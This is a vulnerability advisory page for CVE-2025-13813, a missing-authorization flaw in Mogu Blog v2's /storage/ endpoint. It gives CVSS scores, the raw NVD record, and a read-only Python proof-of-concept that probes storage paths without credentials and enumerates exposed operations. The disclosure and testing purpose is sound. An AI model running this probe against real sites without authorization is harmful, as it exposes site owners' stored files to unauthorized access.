Security Vulnerability Report
CVE-2025-13813 CVSS 5.6 MEDIUM

CVE-2025-13813

Published: 2025-12-01 07:16:01
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in moxi159753 Mogu Blog v2 up to and including 5.2. It affects unspecified processing in the file /storage/ of the Storage Management Endpoint component. The flaw is missing authorization (CWE-862 / CWE-863): the endpoint can be reached without the credentials it should require. The attack can be initiated remotely without privileges or user interaction; attack complexity is rated high and exploitability is assessed as difficult. A public proof of concept exists and may be used. The vendor was contacted early about this disclosure but did not respond, and no vendor fix or patched version is referenced in this record.

CVSS Details

CVSS Score
5.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 5.6 MEDIUM figure above is the VulDB (secondary) CVSS 3.1 assessment. The NVD primary CVSS 3.1 assessment in the raw record below rates the same flaw 8.1 HIGH (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H), and the VulDB CVSS 4.0 vector scores it 2.9 LOW. Prioritize using the impact assumptions that match your deployment rather than the headline number alone.

Configurations (Affected Products)

cpe:2.3:a:mogublog_project:mogublog:*:*:*:*:*:*:*:* - VULNERABLE
Mogu Blog v2 <= 5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It sends unauthenticated GET requests to a handful of storage-related paths and flags any that return HTTP 200 with storage-like content; that is a heuristic check, not proof of exploitation, and a positive result should be confirmed manually before being reported as a finding.
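#!/usr/bin/env python3
"""CVE-2025-13813 PoC - Mogu Blog v2 (<= 5.2) missing authorization on /storage/.

Affected component: the Storage Management endpoint (/storage/), which in
affected builds answers without the credentials it should require
(CWE-862 / CWE-863).

What this script does: it issues unauthenticated GET requests to a handful of
storage-related paths and reports any that answer 200 directly with a body that
looks like storage/file content.  That is a heuristic, not proof.  A 200 from an
SPA shell, a soft-404 page or an error page that happens to mention "file"
would trip it, so a positive result must be confirmed by hand (for example by
diffing the body against an authenticated request) before it is reported.

Every request is a GET; nothing is uploaded, modified or deleted on the target.

For authorized security testing only.
"""

import sys

# Candidate paths for the storage-management endpoint.  The advisory names only
# "/storage/"; the rest are common mount points for the same handler.
STORAGE_PROBES = (
    'storage/',
    'api/storage/',
    'admin/storage/',
    'storage/list',
    'storage/files',
)

# Storage operations tried once the endpoint looks exposed (read-only GETs).
STORAGE_OPERATIONS = {
    'list': 'storage/',
    'files': 'storage/files',
    'upload': 'storage/upload',
    'download': 'storage/download',
}

DEFAULT_TIMEOUT = 10  # seconds per request
SAMPLE_BYTES = 200    # how much of a response body to echo during enumeration
REDIRECT_STATUSES = frozenset({301, 302, 303, 307, 308})
AUTH_REQUIRED_STATUSES = frozenset({401, 403})


def _normalize_target(target_url: str) -> str:
    """Return *target_url* with a trailing slash so probe paths can be appended."""
    return target_url if target_url.endswith('/') else target_url + '/'


def _default_session(verify_tls: bool = True):
    """Build a ``requests.Session`` for live probing.

    ``requests`` is imported lazily so the probe logic can be exercised with an
    injected stand-in session (tests, replay) without the dependency installed.
    TLS verification stays ON unless the caller opts out; a scanner that
    silently disables it is itself open to on-path tampering.
    """
    import requests  # third-party; only needed when no session is injected

    session = requests.Session()
    session.verify = verify_tls
    return session


def check_vulnerability(target_url: str, *, session=None,
                        timeout: float = DEFAULT_TIMEOUT,
                        verify_tls: bool = True) -> bool:
    """Probe *target_url* for an unauthenticated storage-management endpoint.

    Args:
        target_url: base URL of the Mogu Blog instance (scheme + host[:port][/path]).
        session: object exposing ``get(url, timeout=..., allow_redirects=...)``
            that returns something with ``status_code``, ``text`` and ``headers``;
            defaults to a fresh ``requests.Session``.  Injected in tests.
        timeout: per-request timeout in seconds.
        verify_tls: verify the server certificate (used only when *session* is None).

    Returns:
        True if at least one probe answered 200 *without* redirecting and with a
        body mentioning storage/file content; False otherwise.  Network errors on
        individual probes are reported and skipped, never raised.
    """
    base = _normalize_target(target_url)
    if session is None:
        session = _default_session(verify_tls)

    print(f"[*] Testing target: {base}")
    print("[*] CVE-2025-13813: Mogu Blog v2 Storage Management Authorization Bypass")
    print("-" * 60)

    vulnerable = False
    for probe in STORAGE_PROBES:
        url = base + probe
        print(f"\n[+] Testing endpoint: {url}")
        try:
            # No credentials, and do NOT follow redirects: a 302 to a login page
            # that renders as 200 is the classic false positive for this check.
            response = session.get(url, timeout=timeout, allow_redirects=False)
        except OSError as exc:  # requests.RequestException subclasses IOError
            print(f"    [ERROR] Request failed: {exc}")
            continue

        status = response.status_code
        print(f"    Status Code: {status}")
        if status == 200:
            body = response.text.lower()
            if 'storage' in body or 'file' in body:
                print("    [VULNERABLE] Endpoint accessible without authentication!")
                print(f"    Response length: {len(response.text)} bytes")
                vulnerable = True
                if 'index' in body or 'list' in body:
                    print("    [INFO] Storage listing may be available")
            else:
                print("    [INFO] 200 without storage-related content; likely a generic page")
        elif status in REDIRECT_STATUSES:
            location = response.headers.get('Location', '?')
            print(f"    [SAFE] Redirected to {location}; probably a login gate")
        elif status in AUTH_REQUIRED_STATUSES:
            print("    [SAFE] Endpoint requires authentication")
        else:
            print("    [INFO] Unexpected status code")
    return vulnerable


def exploit_storage_access(target_url: str, *, session=None,
                           timeout: float = DEFAULT_TIMEOUT,
                           verify_tls: bool = True) -> list[str]:
    """Enumerate which storage operations answer 200 without credentials.

    Read-only: every operation is requested with GET.  Response samples are
    printed via ``repr`` so control/escape sequences sent by the server cannot
    reach the terminal unescaped.

    Args:
        target_url, session, timeout, verify_tls: as for ``check_vulnerability``.

    Returns:
        Names of the operations (keys of ``STORAGE_OPERATIONS``) that returned
        200 directly, in probe order; empty if none did.
    """
    base = _normalize_target(target_url)
    if session is None:
        session = _default_session(verify_tls)

    print("\n[*] Attempting storage enumeration...")
    reachable = []
    for op_name, path in STORAGE_OPERATIONS.items():
        url = base + path
        try:
            response = session.get(url, timeout=timeout, allow_redirects=False)
        except OSError as exc:
            # Report and move on; the original swallowed everything with a bare
            # except, which also hid KeyboardInterrupt.
            print(f"[-] {op_name} endpoint unreachable: {url} ({exc})")
            continue
        if response.status_code == 200:
            reachable.append(op_name)
            print(f"[+] {op_name} endpoint accessible: {url}")
            print(f"    Sample response: {response.text[:SAMPLE_BYTES]!r}...")
    return reachable


def main(argv=None) -> int:
    """CLI entry point: ``cve-2025-13813.py [-k|--insecure] <target_url>``.

    Returns the process exit status (1 on usage error, 0 otherwise).
    """
    args = list(sys.argv[1:] if argv is None else argv)
    insecure = '-k' in args or '--insecure' in args
    targets = [a for a in args if a not in ('-k', '--insecure')]
    if not targets:
        print("Usage: python cve-2025-13813.py [-k|--insecure] <target_url>")
        print("Example: python cve-2025-13813.py http://target.com")
        print("  -k/--insecure  skip TLS certificate verification (self-signed labs only)")
        return 1

    target = targets[0]
    session = _default_session(verify_tls=not insecure)
    if check_vulnerability(target, session=session):
        print("\n[!] Target appears to be VULNERABLE to CVE-2025-13813 (heuristic - confirm manually)")
        print("[*] Running extended enumeration...")
        exploit_storage_access(target, session=session)
    else:
        print("\n[*] Target does not appear to be vulnerable")
    return 0


if __name__ == "__main__":
    sys.exit(main())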

References

Raw JSON Data

{"cve": {"id": "CVE-2025-13813", "sourceIdentifier": "[email protected]", "published": "2025-12-01T07:16:01.493", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in moxi159753 Mogu Blog v2 up to 5.2. This issue affects some unknown processing of the file /storage/ of the component Storage Management Endpoint. The manipulation leads to missing authorization. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitability is assessed as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": 
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mogublog_project:mogublog:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.2", "matchCriteriaId": "A6BBC198-704E-4815-A027-17BDF2902A11"}]}]}], "references": [{"url": "https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md#proof-of-concept", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.333822", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333822", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.692104", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}